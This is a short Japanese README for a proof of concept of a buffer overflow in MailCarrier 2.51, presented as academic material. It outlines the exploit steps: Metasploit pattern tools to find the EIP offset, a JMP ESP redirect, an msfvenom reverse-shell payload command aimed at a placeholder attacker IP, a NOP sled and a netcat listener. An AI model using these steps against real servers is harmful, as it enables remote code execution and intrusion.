
このProof of Concept(PoC)は、MailCarrier 2.51におけるバッファオーバーフローの脆弱性を示し、リモートの攻撃者が長い文字列を介して任意のコードを実行することを可能にします。この脆弱性は以下のプロセスを使用して悪用される可能性があります:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRこのプロジェクトは、バッファオーバーフローがどのように機能するかを理解するための学術的なアプローチを提供することを目的としています。
テストを実行する前に、最初の実験には本番環境を決して使用しないでください。代わりに、本番環境に類似したラボ環境を作成して、問題や意図しない結果を回避してください。
msf-pattern_create -l <number_of_bytes>
これにより、EIPを上書きするために必要な正確なバイト数であるオフセットを特定できます。
msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
これにより、EIPを制御するために必要な正確なバイト数が特定されます。
JMP ESP
CALL ESP
このアドレスを使用して実行をリダイレクトします。ASLR、SafeSEH、またはその他の保護メカニズムに注意してください。
msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
NOP(\x90)命令を挿入して安定性を向上させます。netcat(nc)を使用してリバースシェルを作成し、ターゲットに接続します。